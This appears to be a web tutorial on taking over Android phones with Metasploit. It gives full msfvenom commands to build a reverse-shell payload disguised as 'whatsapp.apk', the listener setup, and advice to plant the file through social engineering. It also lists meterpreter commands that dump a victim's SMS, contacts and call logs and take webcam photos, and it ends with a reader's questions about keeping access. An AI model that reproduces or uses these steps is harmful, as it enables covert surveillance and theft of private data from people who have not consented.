Android platforms only support apps with .apk extensions, so we are going to build our malicious payload in .apk format.
How to hack android Phone completely
Step 1:
First of all we need to install the Metasploit framework so type the below command in your terminal
LINUX
sudo apt-get install metasploit
TERMUX
pkg install metasploit
Step 2:
Then we need to get our public IP address so type the below commands in your terminal
LINUX
sudo ifconfig
TERMUX
ifconfig

Step 3:
After that we need to create the payload so execute the below commands on your terminal
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 R > whatsapp.apk
Lhost = ( according to your ip )
Lport = ( according to you )
R = Raw Format
P = ( platform )

Step 4:
After creating the android Payload open the Metasploit framework using the following command
msfconsole
Then create the multi handler this will help you to get the reverse connection to the victim phone to your terminal so execute the following commands one by one
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.107
set lport 4444
exploit

Hack the victim phone
Now set the payload to victim phone you can use any social engineering technique

When victim will run this apk file you can oberve meterpreter session will open.

After we hack victim’s phone, there are many things we can do by using these commands like call logs, camera, screenshots, WhatsApp chats, SMS details and much more. But we are going to show some of the main commands given below.

To show all features use the following command ;
help

Get OS Information ;
sysinfo

Check Device Rooted or Not
check_root

Check Installed APPS
app_list

Uninstall Specific Application
app_uninstall

Get All Call Logs
dump_calllog

Get Contact List
dump_contacts

Get SMS List
dump_sms

You can use webcam of victim for capture the picture
webcam_snap

we have to install apk on victim’s phone everytime when we try to check the call logs , device info occasionally?
or does the metasploit saves the device connection and we can always come back anytime to terminal and get our victim’s phone info?
and does this work on new Android versions like Android 10,11 ,12?